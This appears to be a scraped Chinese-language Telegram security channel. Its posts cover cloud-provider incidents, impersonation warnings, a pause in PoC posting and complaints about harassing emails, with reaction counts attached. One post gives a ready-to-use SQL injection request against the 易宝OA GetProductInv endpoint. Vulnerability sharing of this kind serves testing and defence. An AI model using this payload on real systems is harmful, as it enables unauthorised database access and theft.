我知道我这人嘴讨嫌tg上招惹了不少人不少大黑客,这个正常,你看我不爽你私聊也好群里骂娘也好随便你,反正网上冲浪就图一乐嘛对吧
你对我有意见你也说清楚哪里有意见行吗?你们这些个无敌的大黑客黑产神,低能到就天天往人邮箱里塞鬼图是吧。第一次我打开可能还吓一跳,第二次第三次莫名奇妙不认识的人给我发邮件你觉得我会不知道里边是啥玩意吗?是你傻还是我傻
我素质低我承认,逮到别人短处就爱揪着不放,但是我不会莫名其妙无缘无故的追着人骂。有的人或者有些组织又菜又爱装,装不下去了撒泼打滚红温骂娘,骂娘骂不动就整些难绷烂活往别人邮箱里塞鬼图跳脸gif,你多大了啊孩子
你对我有意见你也说清楚哪里有意见行吗?你们这些个无敌的大黑客黑产神,低能到就天天往人邮箱里塞鬼图是吧。第一次我打开可能还吓一跳,第二次第三次莫名奇妙不认识的人给我发邮件你觉得我会不知道里边是啥玩意吗?是你傻还是我傻
我素质低我承认,逮到别人短处就爱揪着不放,但是我不会莫名其妙无缘无故的追着人骂。有的人或者有些组织又菜又爱装,装不下去了撒泼打滚红温骂娘,骂娘骂不动就整些难绷烂活往别人邮箱里塞鬼图跳脸gif,你多大了啊孩子
👍9🥴3😢2👎1
易宝OA GetProductInv SQL注入漏洞复现
GET /SmartTradeScan/Inventory/GetProductInv?boxNoName=1%27%20AND%201411%20IN%20(SELECT%20(CHAR(113)%2bCHAR(98)%2bCHAR(112)%2bCHAR(112)%2bCHAR(113)%2b(SELECT%20(CASE%20WHEN%20(1411=1411)%20THEN%20CHAR(49)%20ELSE%20CHAR(48)%20END))%2bCHAR(113)%2bCHAR(120)%2bCHAR(122)%2bCHAR(122)%2bCHAR(113)))--%20YyAm&positionName=2&productID=3&opeID=4 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.712.36 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close
❤1👍1👎1
https://mp.weixin.qq.com/s/PgduTGIvWSUgHZhVfnb7Bg
有点过了
事实上任何一个规模大到一定程度参与人数众多的技术项目,时间长了都或多或少会整出些唐氏操作,注意用词我这里说的是唐氏,就是相当脑残的错误了,不是小过失
阿里腾讯这些大厂的人不会像我们想象中那样无所不能永远正确,说是草台班子还是过了,这件事情最ex人的其实是后期腾讯云的公关,经典推卸责任大事化小忽悠用户。但是不要因为这么一件两件事情就扯什么不要用腾讯云了,不知名小机房的问题只会比大厂更多
最后加一句,冯若航作为搞数据库从他的角度一直在反对业务上云,开发圈争论这个事情很久了,我不了解。但是从安全的角度来看重要敏感业务云服务器是非常必要的,最好把邮服都上云了。一个外网口子只要是在域环境内不是云机房远程托管被各方惦记的概率直线上升——你那玩意背后连着内网的,起0day都要把你拿下了
有点过了
事实上任何一个规模大到一定程度参与人数众多的技术项目,时间长了都或多或少会整出些唐氏操作,注意用词我这里说的是唐氏,就是相当脑残的错误了,不是小过失
阿里腾讯这些大厂的人不会像我们想象中那样无所不能永远正确,说是草台班子还是过了,这件事情最ex人的其实是后期腾讯云的公关,经典推卸责任大事化小忽悠用户。但是不要因为这么一件两件事情就扯什么不要用腾讯云了,不知名小机房的问题只会比大厂更多
最后加一句,冯若航作为搞数据库从他的角度一直在反对业务上云,开发圈争论这个事情很久了,我不了解。但是从安全的角度来看重要敏感业务云服务器是非常必要的,最好把邮服都上云了。一个外网口子只要是在域环境内不是云机房远程托管被各方惦记的概率直线上升——你那玩意背后连着内网的,起0day都要把你拿下了
👍7
最近暂停一下更新poc
不是被查水表或者其他什么很黑客的不可抗力原因,(像你海子哥圈完钱封群跑路要找理由说什么被韩国国安局调查了)单纯就是我现在每天上班起得早,不想复制粘贴了,懒
频道再过一个月就运营一年了,我感觉从漏洞到工具到学习资料到吃瓜到原创文章到各种权限,反正我能想到的东西都发了一遍,我是真没活可以整了。国护一完就去新单位二面,到时候就退tg了,频道我也不会像现在一样高强度天天更新,最后一点时间,还有什么想看的安全方面的东西或者问题都可以给我说,尽量做到都回复
还有频道名称也不准备再频繁换了,有什么好的头像和名字,适合长期用的,征求大家的意见
不是被查水表或者其他什么很黑客的不可抗力原因,(像你海子哥圈完钱封群跑路要找理由说什么被韩国国安局调查了)单纯就是我现在每天上班起得早,不想复制粘贴了,懒
频道再过一个月就运营一年了,我感觉从漏洞到工具到学习资料到吃瓜到原创文章到各种权限,反正我能想到的东西都发了一遍,我是真没活可以整了。国护一完就去新单位二面,到时候就退tg了,频道我也不会像现在一样高强度天天更新,最后一点时间,还有什么想看的安全方面的东西或者问题都可以给我说,尽量做到都回复
还有频道名称也不准备再频繁换了,有什么好的头像和名字,适合长期用的,征求大家的意见
😭13😢3👎2🤬2
https://mp.weixin.qq.com/s/SZ73s2XJdRJkSWWbyO6O4A
我也是女的为什么不来骚扰我,是因为现实里长得也跟个鼹鼠一样矮小哥布林,线下真实怕被你年跌的无敌王八拳暴打吗🤣
我也是女的为什么不来骚扰我,是因为现实里长得也跟个鼹鼠一样矮小哥布林,线下真实怕被你年跌的无敌王八拳暴打吗🤣
😐7😁4
今天早上开始有很多冒充我的了,顶着我的id简介和头像去什么渗透接单一类的,注意我的id是 @metaspolit233,看清楚字母,或者保险直接从管理列表点进去
私聊过的都知道,我不是黑产哥从来不接什么单子的,回复从来都是不知道不认识不能然后已读不回,更不可能唐突发病了突然主动私聊你我要接单了速度给我打钱😅,再次统一回答,不接单,不认识能接的人,不搞教学,不卖漏洞,不卖证书,不回答问题请百度或者在群里问。记住就算是我这个号,本人,哪天突然给你说我要接单了——也别打钱,号被盗了,忘周知
私聊过的都知道,我不是黑产哥从来不接什么单子的,回复从来都是不知道不认识不能然后已读不回,更不可能唐突发病了突然主动私聊你我要接单了速度给我打钱😅,再次统一回答,不接单,不认识能接的人,不搞教学,不卖漏洞,不卖证书,不回答问题请百度或者在群里问。记住就算是我这个号,本人,哪天突然给你说我要接单了——也别打钱,号被盗了,忘周知
🥰7🤣3❤1